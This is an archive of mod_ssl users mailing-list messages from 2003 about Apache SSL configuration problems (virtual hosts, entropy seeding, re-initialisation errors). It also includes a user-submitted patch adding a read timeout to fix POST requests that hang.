Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, 27 Feb 2003, Nick Tonkin wrote:

> On Thu, 27 Feb 2003, R. DuFresne wrote:
> 
> >
> > You gave this site it's own IP address yes?
> 
> No. It is using NameVirtualHost.
> 
> >
> > Virtual hosting with non-ssl works in a 'software' aware mode, while
> > virtual hosting with ssl is more 'hardware' in nature requireing specifici
> > IP addressing to function properly.
> 
> 
> Hmm. I must have missed this in the docos. Rechecking ...
> 
> Hm. Well, I see that I was on the wrong track with "How can I authenticate
> my clients for a particular URL based on certificates but still allow
> arbitrary clients to access the remaining parts of the server?" ... that
> appears on closer inspection to deal with certificate-wielding clients ...
> 
> Hm.
> 
> So, bottom line, it is not possible to have a virtual host accessible via
> http and require SSL for a part of it. Is that correct?

It's somewhat dependant upon what you are serving up.  If there are like
perhaps two ends of the virtual host, say, http://www.someplace.com and
https://someplace.com under the same IP address space, then you will work
okay.  If you are virtual hosting more then this, then you need seperate
IP addresses for at least each and every SSL vh, and if there's a no0n-ssl
end, that vh would need to most likely match the IP addressing setup of
the ssl side.  I'm sure others will correct or enhance what I'm prolly
splaining poorly here.

thanks,

Ron DuFresne


> 
> Thanks,
> 
> - nick
> 
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 27 22:25:18 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 35B772AA054; Thu, 27 Feb 2003 22:25:18 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from world.tonkinresolutions.com (233-123.adsl6.netlojix.net [207.71.233.123])
	by master.modssl.org (Postfix) with ESMTP id 6001C2AA024
	for ; Thu, 27 Feb 2003 22:25:16 +0100 (CET)
Received: from world.tonkinresolutions.com (localhost.tonkinresolutions.com [127.0.0.1])
	by world.tonkinresolutions.com (8.12.7/8.12.6) with ESMTP id h1RLOVVk056638;
	Thu, 27 Feb 2003 13:24:31 -0800 (PST)
	(envelope-from nick@tonkinresolutions.com)
Received: from localhost (nick@localhost)
	by world.tonkinresolutions.com (8.12.7/8.12.6/Submit) with ESMTP id h1RLOVcl056635;
	Thu, 27 Feb 2003 13:24:31 -0800 (PST)
X-Authentication-Warning: world.tonkinresolutions.com: nick owned process doing -bs
Date: Thu, 27 Feb 2003 13:24:31 -0800 (PST)
From: Nick Tonkin 
To: Shawn Syms 
Cc: "'modssl-users@modssl.org'" 
Subject: RE: securing one area of a vhost in apache 2
In-Reply-To: <49A0B02B67B70045B358D868C7B5D0C79874B0@imail.torinfinet.infinetcomm.com>
Message-ID: <20030227132224.N56452@world.tonkinresolutions.com>
References: <49A0B02B67B70045B358D868C7B5D0C79874B0@imail.torinfinet.infinetcomm.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Nick Tonkin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, 27 Feb 2003, Shawn Syms wrote:

> >>>So, bottom line, it is not possible to have a virtual host accessible via
> http and require SSL for a part of it. Is that correct?
>
> It's not really logical to want to segment out SSL-using and non-SSL-using
> sections of a site within the server config; do this on the site itself in
> the code. Here is what is commonly done, where I work anyway.
>
> In your apache config, specify the use of SSL for the entire site. The
> certificate applies to the entire site anyway, since a certificate applies
> to anything that falls under the fully qualified domain name (FQDN) on the
> certificate.
>
> In the ***code*** of your site, hardcode the URL for the sections that
> security to include "https" -- this sort of hardcoding (ie, using an
> absolute path for the links instead of a relative one) is not "bad form"
> since the URL should only be accessed using the FQDN anyway (ie, along as
> the value on the certificate doesn't change, neither would the single
> correct URL).
>
> In the links that lead *out* of the secured area of the site, use absolute
> links that specify "http" rather than "https".
>
> Also in the code, if anyone tries to access those sections without SSL,
> rewrite the URL in their browser so that it includes the "https".
>
> And finally, also in the code, for any sections that don't require SSL (and
> where you don't want the performance impact on needless SSL traffic), test
> to see if the URL entered by the user includes "https" -- if it does,
> rewrite it to remove the "s".
>
> This works well for us and it pretty straight-forward to implement.
>
> Regards,
> S.

Thanks for the suggestion. But the problem is I can't get the server
configured as I want to to speak SSL even in testing.

-nick
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 28 11:40:20 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A102C2AA036; Fri, 28 Feb 2003 11:40:20 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id F3B1F2AA015
	for ; Fri, 28 Feb 2003 11:40:17 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h1SAkw114267
	for ; Fri, 28 Feb 2003 10:47:20 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Fri, 28 Feb 2003 10:39:39 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F275C@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: securing one area of a vhost in apache 2
Date: Fri, 28 Feb 2003 10:39:38 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> -----Original Message-----
> From: Nick Tonkin [mailto:nick@tonkinresolutions.com]
> Sent: 27 February 2003 21:01
> To: modssl-users@modssl.org
> Cc: mads@toftum.dk
> Subject: Re: securing one area of a vhost in apache 2
> 
> 
> On Thu, 27 Feb 2003, Mads Toftum wrote:
> 
> > On Thu, Feb 27, 2003 at 12:52:06PM -0800, Nick Tonkin wrote:
> > > nick@world ~>lwp-request -sSed 
> https://www.ladyraquel.com:8080/secure/
> > > GET https://www.ladyraquel.com:8080/secure/ --> 501 
> Protocol scheme 'https' is not supported
> > > ## huh?!
> 
> > This looks very much like a client error from lwp. You need
> > Crypt::SSLeay for that, see:
> > http://search.cpan.org/author/CHAMAS/Crypt-SSLeay-0.49/
> 
> I'm sorry, for what? For requesting https?
> 
> - nick
> 
Have you tried requesting these pages another way, eg with a browser or even
curl (http://curl.haxx.se)? Like Mads says, it does look to be a client
error.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

A world of difference - in the UK, 37 million people put their faith on the
last census as "Christian". In Saudi Arabia, this answer would carry a death
sentence for any Saudi.

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 28 16:24:57 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 113A22AA035; Fri, 28 Feb 2003 16:24:57 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from math.gatech.edu (math.gatech.edu [130.207.146.50])
	by master.modssl.org (Postfix) with ESMTP id 284B62AA024
	for ; Fri, 28 Feb 2003 16:24:51 +0100 (CET)
Received: from uglab01.math.gatech.edu (uglab01.math.gatech.edu [199.77.200.101])
	by math.gatech.edu (8.12.6/8.12.6) with ESMTP id h1SFOj5M009664
	for ; Fri, 28 Feb 2003 10:24:46 -0500 (EST)
Date: Fri, 28 Feb 2003 10:24:45 -0500 (EST)
From: Carlos Villegas 
To: modssl-users@modssl.org
Subject: Re: Strange startup problem with Apache 2.0.44
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=iso-8859-1
Content-Transfer-Encoding: 8BIT
X-Spam-Level:  (0) 7 required for Spam
X-Scanned-By: MIMEDefang 2.28 (www . roaringpenguin . com / mimedefang)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Carlos Villegas 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I also had some strange problems with apache 2.0.44 on solaris 9, it 
turned out to be that the module automatically uses conf/ssl.conf (which I 
didn't expect). So my suggestion is that you should add all the ssl 
configuration in this file only.

Carlos

> Dear all,
> 
> first the properties of my box: Solaris 7 (hence no /dev/random) and gcc 3.0.1.
> I compiled Apache 2.0.44 with the following options:
> 
> ./configure --prefix=/usr/local/apache-2.0.44-ssl --enable-info --enable-ssl \
> --with-egd=/var/adm/entropy
> 
> My SSL is 0.9.7a, and /var/adm/entropy is a socket serviced by PRNG (I tested it
> with egc.pl and it delivers the desired data, but this is not the problem)
> 
> When I try to start the server error_log writes:
> [Thu Feb 27 13:24:41 2003] [info] Init: Initializing OpenSSL library
> [Thu Feb 27 13:24:41 2003] [info] Init: Seeding PRNG with 0 bytes of entropy
> [Thu Feb 27 13:24:41 2003] [warn] Init: PRNG still contains insufficient entropy!
> [Thu Feb 27 13:24:41 2003] [info] Init: Generating temporary RSA private keys (512/1024 bits)
> [Thu Feb 27 13:24:41 2003] [error] Init: Failed to generate temporary 512 bit RSA private key
> Configuration Failed
> 
> The relevant portions of my httpd.conf:
> 
>     Include conf/test-ssl.conf
> 
> 
> And in test-ssl.conf:
> SSLRandomSeed startup builtin
> SSLRandomSeed startup egd:/var/adm/entropy 512
> SSLRandomSeed connect builtin
> SSLRandomSeed connect egd:/var/adm/entropy 512
> 
> The rest is more or less standard. Whatever I write into test-ssl.conf the error
> message shown above comes again. Even if I comment out SSL in httpd.conf:
> #
> #    Include conf/test-ssl.conf
> #
> 
> the same message appears. A truss on the process (with or without outcommented
> mod_ssl.c) yields the same:
> 
> 14566:  open("/dev/urandom", O_RDONLY|O_NONBLOCK|O_NOCTTY) Err#2 ENOENT
> 14566:  open("/dev/random", O_RDONLY|O_NONBLOCK|O_NOCTTY) Err#2 ENOENT
> 14566:  open("/dev/srandom", O_RDONLY|O_NONBLOCK|O_NOCTTY) Err#2 ENOENT
> 
> What is happening here? My Solaris box has none of these /dev/*random, but
> why are they called when I a) specify /var/adm/entropy and b) even when
> I don't want to start SSL at all?
> 
> 
> Thank a lot in advance for your input,
> Beat
> --
> Beat Müller
> Institut für Elektronik
> ETH Zürich - Schweiz
> beat.mueller@ife.ee.ethz.ch
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
Doubt is a not a pleasant mental state, but certainty is a ridiculous one.  
                -- Voltaire



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 28 18:56:35 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2AC372AA036; Fri, 28 Feb 2003 18:56:35 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from neptun.sns-felb.debis.de (neptun.sns-felb.debis.de [53.122.101.2])
	by master.modssl.org (Postfix) with SMTP id B5A7B2AA015
	for ; Fri, 28 Feb 2003 18:56:33 +0100 (CET)
Received: by neptun.sns-felb.debis.de; id SAA26027; Fri, 28 Feb 2003 18:56:33 +0100
Received: from unknown(53.113.82.10) by neptun.sns-felb.debis.de via smap (V5.0)
	id xma026019; Fri, 28 Feb 03 18:56:32 +0100
Received: from mail1.c1.dsh.de (localhost [127.0.0.1])
	by dshmail1.dsh.de (8.9.1/8.8.7) with ESMTP id SAA15690
	for ; Fri, 28 Feb 2003 18:56:31 +0100 (MET)
Received: from t-systems.com (lpzpc326.clients.win.c1.dsh.de [172.20.16.226])
	by mail1.c1.dsh.de (8.10.0/8.10.0) with ESMTP id h1SHuUu23292
	for ; Fri, 28 Feb 2003 18:56:30 +0100
Message-ID: <3E5FA2CE.2080400@t-systems.com>
Date: Fri, 28 Feb 2003 18:56:30 +0100
From: Dimitri Rebrikov 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020623 Debian/1.0.0-0.woody.1
X-Accept-Language: de-de, en-us, ru
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: (BUG?) mod_ssl/openssl hangs on POST-Request with false Content-Length
X-Enigmail-Version: 0.63.3.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dimitri Rebrikov 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

We have problems with broken POST-Requests that our Partner
sends to us over HTTPS.
They are using the Software wrote by they own.(Not a Web-Browser).
We are using Apache, mod_ssl/openssl, mod_jk, Tomcat und servlets to Process they Requests.
The POST-Requests they sends have from time to time too big Content-Length
declaration that the Requests' Bodies real have.
Such requests hangs as long as the Partner shut it down (long time!).
The httpd.conf Timeout parameter seems to dont play any role here.
Many such requests from many partner's instanzes paralyze our System.

Our enviroment:
-----
SunOS #### 5.8 Generic_108528-18 sun4u sparc SUNW,Sun-Blade-1000
-----
[Fri Feb 28 16:47:01 2003] [notice] Apache/1.3.27 (Unix) mod_jk/1.2.0 mod_ssl/2.8.12 OpenSSL/0.9.7 configured -- resuming normal operations
-----
EAPI_MM="../mm-1.2.2" \
SSL_BASE="/export/schufa05/toschuel/Software/openssl-0.9.7" \
./configure \
"--with-layout=Apache" \
"--prefix=/usr/local/apache" \
"--enable-shared=ssl" \
"--enable-module=so" \
"--disable-module=imap" \
"--disable-module=include" \
"--disable-module=cgi" \
"--disable-module=actions" \
"--disable-module=userdir" \
"--enable-module=ssl" \
"$@"
-----
Apache Tomcat/4.0.4
-----

I have analyzed the Sorce Code from mod_jk/Apache/mod_ssl and log-Outputs with following results:

It hangs as the mod_jk try to read out the encrypted Body of the Request. Hiere is the Function-Call-Chain.

ws_read(mod_jk.c)
ap_get_client_block(apache/http_protokol.c)
ap_bread(apache/buff.c)
read_with_errors(same)
saferead(same)
saferead_guts(same)
buff_read(same)
ap_read(same)
"ap::buff::read" hook
ssl_io_hook_read(mod_ssl/ssl_engine_io.c)
SSL_read() - hangs !

I have inserted a short select()-Checking just before SSL_read in the ssl_io_hook_read
and the Problem gone!
Here is a changed ssl_io_hook_read - Code:
----------------------------------------------------------------------
static int ssl_io_hook_read(BUFF *fb, char *buf, int len)
{
     SSL *ssl;
     conn_rec *c;
     int rc;

     if ((ssl = ap_ctx_get(fb->ctx, "ssl")) != NULL) {
       {
         /*
          * +++---+++
          *
          * Check/Wait for Nonblocking-Data
          *
          */
         int rv;
         fd_set fds;
         struct timeval tv;
         FD_ZERO(&fds);
         FD_SET(fb->fd_in, &fds);
         c = (conn_rec *)SSL_get_app_data(ssl);
         tv.tv_sec = c->server->timeout;
         tv.tv_usec = 0;
         rv = ap_select(fb->fd_in + 1, &fds, NULL, NULL, &tv);
         if(rv <= 0) {
           return -1;
         }
       }

         rc = SSL_read(ssl, buf, len);
         /*
          * Simulate an EINTR in case OpenSSL wants to read more.
          * (This is usually the case when the client forces an SSL
          * renegotation which is handled implicitly by OpenSSL.)
          */
         if (rc < 0 && SSL_get_error(ssl, rc) == SSL_ERROR_WANT_READ)
             errno = EINTR;
         /*
          * Log SSL errors
          */
         if (rc < 0 && SSL_get_error(ssl, rc) == SSL_ERROR_SSL) {
             c = (conn_rec *)SSL_get_app_data(ssl);
             ssl_log(c->server, SSL_LOG_ERROR|SSL_ADD_SSLERR,
                     "SSL error on reading data");
         }
         /*
          * read(2) returns only the generic error number -1
          */
         if (rc < 0)
             rc = -1;
     }
     else
         rc = read(fb->fd_in, buf, len);
     return rc;
}
----------------------------------------------------------------------

Is that a BUG in mod_ssl/openssl?

Although our Problems could be solved with this mod_sll-Modification
i don have 100% sureness this is a right solution.

Any suggesstion and opinion would be wery appericated.

Best regards
Dimitri

PS

mod_ssl bug database is not working...
-----------------------------------------------------------
Index of /support/bugdb

       Name                    Last modified       Size  Description

[DIR] Parent Directory        22-Dec-2002 11:50      -
[TXT] footer.html             15-Dec-2002 14:47     1k
[TXT] header.html             15-Dec-2002 14:47     8k
[TXT] index.cgi               19-Apr-1999 18:04     1k
[   ] private.cgi             19-Apr-1999 18:04     1k
[   ] template.sh             31-Aug-1998 15:03     1k
[TXT] template.wml            30-Apr-1999 22:09     1k

Apache/1.3.27 Server at www.modssl.org Port 80
---------------------------------------------------------------
-- 

------------------------------------------------------------------------
Dimitri Rebrikov
*T-Systems GEI GmbH*
Projektentwickler
Postanschrift: Prager Straße 15, D-04103 Leipzig
Telefon:         (0341) 1275-439
Telefax:         (0341) 1275-333
E-Mail:          Dimitri.Rebrikov@t-systems.com

Internet:         http://www.t-systems.com
------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 28 19:19:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E53E72AA037; Fri, 28 Feb 2003 19:19:44 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from scaup.mail.pas.earthlink.net (scaup.mail.pas.earthlink.net [207.217.120.49])
	by master.modssl.org (Postfix) with ESMTP id B659D2AA01E
	for ; Fri, 28 Feb 2003 19:19:43 +0100 (CET)
Received: from ampere.eng.atl.earthlink.net ([199.174.116.118] helo=DELIK)
	by scaup.mail.pas.earthlink.net with smtp (Exim 3.33 #1)
	id 18op6k-0007l4-00
	for modssl-users@modssl.org; Fri, 28 Feb 2003 10:19:42 -0800
Message-ID: <001d01c2df55$71341c90$7674aec7@DELIK>
From: "Ihor Bilyy" 
To: 
Subject: mod_ssl 2.8.12 + apache 1.3.26
Date: Fri, 28 Feb 2003 13:15:57 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2720.3000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ihor Bilyy" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello All,

is there any problem running this combination (subj)?

thanks
-i-


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 28 22:04:56 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 50B1B2AA036; Fri, 28 Feb 2003 22:04:56 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sol-roth.sgwebspace.com (sol-roth.sgwebspace.com [63.226.251.129])
	by master.modssl.org (Postfix) with ESMTP id B741E2AA01E
	for ; Fri, 28 Feb 2003 22:04:54 +0100 (CET)
Received: from soylent (unknown [63.226.251.130])
	by sol-roth.sgwebspace.com (Sols Mailer Daemon) with ESMTP id 3D562BEE16
	for ; Fri, 28 Feb 2003 12:58:43 -0800 (PST)
From: "Jeff Bert" 
To: 
Subject: RE: mod_ssl 2.8.12 + apache 1.3.26
Date: Fri, 28 Feb 2003 13:04:59 -0800
Message-ID: <00c101c2df6d$0e7679f0$6501a8c0@soylent>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.4510
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
In-reply-to: <001d01c2df55$71341c90$7674aec7@DELIK>
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Bert" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Yes.  You should use mod_ssl 2.8.12 and apache 1.3.27 as there is a security
issue with apache 1.3.26

Jeff

> -----Original Message-----
> From: owner-modssl-users@modssl.org 
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Ihor Bilyy
> Sent: Friday, February 28, 2003 10:16 AM
> To: modssl-users@modssl.org
> Subject: mod_ssl 2.8.12 + apache 1.3.26
> 
> 
> Hello All,
> 
> is there any problem running this combination (subj)?
> 
> thanks
> -i-
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 28 22:39:55 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5F46B2AA036; Fri, 28 Feb 2003 22:39:55 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 20B182AA01E
	for ; Fri, 28 Feb 2003 22:39:52 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id QAA09354;
	Fri, 28 Feb 2003 16:37:53 -0500
Date: Fri, 28 Feb 2003 16:37:52 -0500 (EST)
From: "R. DuFresne" 
To: Jeff Bert 
Cc: modssl-users@modssl.org
Subject: RE: mod_ssl 2.8.12 + apache 1.3.26
In-Reply-To: <00c101c2df6d$0e7679f0$6501a8c0@soylent>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


additionally, each version of modssl is diff'ed against the version of
apache it is designated for.  There have been times I think Ralf has
givien out probable ways to fit one modssl version into a newer apache
release prior to the new modssl version, but has given warnings about
certain things possibly being borked in the process.

Thanks,

Ron DuFresne

On Fri, 28 Feb 2003, Jeff Bert wrote:

> Yes.  You should use mod_ssl 2.8.12 and apache 1.3.27 as there is a security
> issue with apache 1.3.26
> 
> Jeff
> 
> > -----Original Message-----
> > From: owner-modssl-users@modssl.org 
> > [mailto:owner-modssl-users@modssl.org] On Behalf Of Ihor Bilyy
> > Sent: Friday, February 28, 2003 10:16 AM
> > To: modssl-users@modssl.org
> > Subject: mod_ssl 2.8.12 + apache 1.3.26
> > 
> > 
> > Hello All,
> > 
> > is there any problem running this combination (subj)?
> > 
> > thanks
> > -i-
> > 
> > 
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> > 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar  1 16:30:38 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 727EE2AA051; Sat,  1 Mar 2003 16:30:38 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from filibusta.crema.unimi.it (filibusta.crema.unimi.it [159.149.70.89])
	by master.modssl.org (Postfix) with ESMTP id B0B822AA038
	for ; Sat,  1 Mar 2003 16:30:36 +0100 (CET)
Received: by filibusta.crema.unimi.it (Postfix, from userid 701)
	id 3BACEE07; Sat,  1 Mar 2003 16:27:53 +0100 (CET)
Date: Sat, 1 Mar 2003 16:27:53 +0100
To: modssl-users@modssl.org
Subject: Illegal attempt to re-initialise SSL for server
Message-ID: <20030301152753.GA8082@filibusta.crema.unimi.it>
Mail-Followup-To: modssl-users@modssl.org
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="AqsLC8rIMeq19msA"
Content-Disposition: inline
User-Agent: Mutt/1.3.28i
From: cavok@filibusta.crema.unimi.it (Domenico Andreoli)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: cavok@filibusta.crema.unimi.it (Domenico Andreoli)
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--AqsLC8rIMeq19msA
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

hi,

i'm able to get this error message with the following configuration
file fragment put in the global context:

---------------- CUT HERE ------------------------------
# ...
SSLEngine on
SSLCertificateFile /etc/apache/ssl.crt/server.crt
SSLCertificateKeyFile /etc/apache/ssl.key/server.key



# ...
---------------- CUT HERE ------------------------------

without any VirtualHost diretive apache starts correctly with SSL on
every port it listens to.

as soon as i insert a VirtualHost directive, even if empty, apache
doesn't start and i get the error message in subject.

if i put the SSL directive into a VirtualHost everything works as usual.

i can reproduce it with different configuration files.

any advice?


thanks
cavok

-----[ Domenico Andreoli, aka cavok
 --[ http://filibusta.crema.unimi.it/~cavok/gpgkey.asc
   ---[ 3A0F 2F80 F79C 678A 8936  4FEE 0677 9033 A20E BC50

--AqsLC8rIMeq19msA
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE+YNF5BneQM6IOvFARAtmEAKCYXPR7CbRM9YZ1ynlyZtgwECunQgCgqg+G
aBpNgiROxhavPdZdAbxzCGY=
=qf4D
-----END PGP SIGNATURE-----

--AqsLC8rIMeq19msA--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar  1 16:54:06 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 793EE2AA050; Sat,  1 Mar 2003 16:54:06 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
